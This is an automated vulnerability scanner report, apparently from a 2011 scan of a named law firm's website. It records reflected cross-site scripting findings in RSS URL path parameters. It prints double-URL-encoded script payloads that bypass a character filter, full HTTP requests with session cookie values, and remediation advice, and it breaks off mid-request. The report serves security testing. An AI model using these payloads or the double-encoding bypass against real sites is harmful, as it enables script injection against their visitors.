The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5de32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebc55ccc6862 was submitted in the REST URL parameter 2. This input was echoed as 5de32"><script>alert(1)</script>bc55ccc6862 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices5de32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebc55ccc6862/Advertising/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80e2b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e09ca10697f5 was submitted in the REST URL parameter 3. This input was echoed as 80e2b"><script>alert(1)</script>09ca10697f5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Advertising80e2b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e09ca10697f5/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ab1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6017d2c2dff was submitted in the REST URL parameter 4. This input was echoed as 86ab1"><script>alert(1)</script>6017d2c2dff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Advertising/rss.xml86ab1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6017d2c2dff HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Lan